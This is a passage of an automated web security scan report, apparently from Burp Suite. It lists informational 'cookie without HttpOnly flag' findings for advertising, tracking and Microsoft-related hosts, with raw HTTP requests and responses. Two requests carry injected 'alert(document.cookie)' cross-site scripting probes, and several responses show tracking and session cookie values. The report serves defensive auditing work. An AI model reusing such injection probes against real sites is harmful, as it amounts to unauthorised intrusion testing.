Set-Cookie: F1=BwRqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: BASE=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!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,730461^950192^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

17.355. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 18:08:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125
Date: Sun, 30 Jan 2011 18:08:30 GMT
Connection: close
Set-Cookie: C2=ekaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: F1=B4RqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: BASE=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!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

17.356. http://r1-ads.ace.advertising.com/site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=izJRNJpwIg02FQFCdbdBUhwUwXAVI8Y4FQFCYTeBUhQ3gZAVIQTnGQFCF2pBUhAohXAVIYZ4FQFCKGeBUhwohXAVIca4FQFCiGeBUhQshXAVwOYAM/oxqI7YCwAoGJ1r1RQcKaEOGK2AI9YxxN53EkL3FkzgPXw6TVQXsumB/0mhqca7HIaWGeQrMew41ZMFkq1B6bjhUq6bDwWZGJ7r4jQsMa4LwaHCW8ohv0I9IsfzFEzsNiQQoaAV; F1=B0OnE1EBAAAABAAAAQAAABA; BASE=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!; ROLL=v5Q240Mxxgzq7NHhPfc3j1yoZKJiMdPbC8fCEdd30GSObC6lkwnqVseu4g1vniv3XYjqYjceyxkwf2tMZSArEQlir5SS2/75sJgaoYVesLytCxbvY9DUCszhatMCKKwTxRIWF+0xTPXT252NsY5JKsYLPWTZUUAXm9JaMAw20vf/mP2cRTHaOgTEMLuyHJXb5Jy8EkMSABMBHiu8OMTbFF6Xd8eJ5ajIEo7MWwYYM2j4u/xo2g3M8yNIsgpaMiSPRegy+4TZaJX30vjsTyS3GGK9P94DueQl+0oOsMvcs3UfJHgL6pNMJ9Bbex1jgMttsrIbsgzmOICEVCga7PcFY4BTH+j6pLnQtbzK/VM!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.950192.730461.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 01:29:43 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 593
Date: Sun, 30 Jan 2011 01:29:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
Set-Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
Set-Cookie: BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
Set-Cookie: ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click

document.write('<script LANGUAGE="JavaScript1.1"');document.write('SRC="http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=000073
...[SNIP]...

17.357. http://realestate.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:34 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3caf83355b934bd3a1c3218117df8e52; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2B753083113044228D3A08B4704A491E; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:34 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 40767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.358. http://realestate.redacted/OmRedir.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /OmRedir.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OmRedir.aspx HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:42 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c7e4694c7e8948a0a852cd53f852c2cd; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E61C86B6F829406795830566D6BAA5ED; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:42 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 7348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://
...[SNIP]...

17.359. http://realestate.redacted/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /article.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article.aspx HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:38 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=93ed9493a41741609bf76926d6d18474; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=BB4451F20548401188ACB52B32195513; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:38 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.360. http://realestate.redacted/slideshow.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /slideshow.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /slideshow.aspx HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=743d5dfc20ea49fc927bbf5e52addae3; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D11A40DFEBAF4362805A6A47E91AD76D; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:35 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 50044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.361. http://redtape.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redtape.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: redtape.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:18:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3df9ab73640c1ed44c1858b2a3c651a7; expires=Sat, 25-Jan-2031 02:18:21 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 65847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

17.362. http://s18.sitemeter.com/js/counter.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s18.sitemeter.com
Path:   /js/counter.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/counter.asp?site=s18neumedia HTTP/1.1
Host: s18.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight2d710%22%3balert(document.cookie)//68483822cd8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:38:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7248
Content-Type: application/x-javascript
Expires: Sun, 30 Jan 2011 01:48:10 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...

17.363. https://sb.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sb.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b HTTP/1.1
Host: sb.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://sb.voicefive.com/b2?
Date: Sun, 30 Jan 2011 01:37:06 GMT
Connection: close
Set-Cookie: UID=c9bed8b-173.223.190.110-1296351426; expires=Tue, 29-Jan-2013 01:37:06 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


17.364. http://search.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.redacted
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: search.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Content-Length: 0
Location: http://www.bing.com/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-Akamai-TestID: eb356f92ec934ef7abb977318c2c1fa7
Expires: Sun, 30 Jan 2011 01:37:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:37:08 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296351428; domain=.redacted; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.redacted; path=/


17.365. https://security.live.com/LoginStage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://security.live.com
Path:   /LoginStage.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LoginStage.aspx HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 29 Jan 2011 23:13:42 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSTOOL1B06 V: 0
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-UA-Compatible: IE=7
Set-Cookie: ASP.NET_SessionId=bh2zle2prh4zk145gn1nyx45; path=/; HttpOnly
Set-Cookie: xid=ef438ff2-3226-4bb0-84b7-a945e2ffe5ee&&TK2xxxxxxx1B06&61; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=783525862&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.security.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:42 GMT; path=/
Set-Cookie: wlv=A|_-d:s*phzLBQ.2+1+0+3; domain=.live.com; path=/
Set-Cookie: PreScript=; path=/
Set-Cookie: E=P:+L7nTSGOzYg=:BemJ+zHQEPLPNnFkDqtAse01gEABPmRe8NpO46JTjNc=:F; domain=.live.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...

17.366. https://security.live.com/LoginStage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://security.live.com
Path:   /LoginStage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LoginStage.aspx?lmif=1000&ru=https://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26id%3D251248%26cbcxt%3Dhom%26vv%3D900%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&cbcxt=hom&vv=900&mkt=EN-US&lc=1033&cbid=0&id=64855 HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:56 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSTOOL1B06 V: 0
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: mkt=ep=en-US; domain=.live.com; path=/
Set-Cookie: ASP.NET_SessionId=h2apx4z4mmbean55o3laku45; path=/; HttpOnly
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 1396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title></h
...[SNIP]...

17.367. http://seedmagazine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seedmagazine.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: seedmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:01 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: exp_last_visit=981011942; expires=Mon, 30-Jan-2012 02:19:02 GMT; path=/
Set-Cookie: exp_last_activity=1296371942; expires=Mon, 30-Jan-2012 02:19:02 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 02:19:02 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 31451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<
...[SNIP]...

17.368. http://seg.admailtiser.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.admailtiser.com
Path:   /st

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /st?cijs=1&cipid=8601&ttype=0&seg=86011&pixels=8601&cirf=http%3A%2F%2Fwww.reimage.com%2Flp%2Fnhome%2Findex.php%3Ftracking%3DNeudesic69f18%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E602f708c63d%26banner%3D%26banner%3D728x90-1%5C%26adgroup%3Ddirect%26ads_name%3Ddirect%26keyword%3Ddirect&ciprf=http%3A%2F%2Fburp%2Fshow%2F9 HTTP/1.1
Host: seg.admailtiser.com
Proxy-Connection: keep-alive
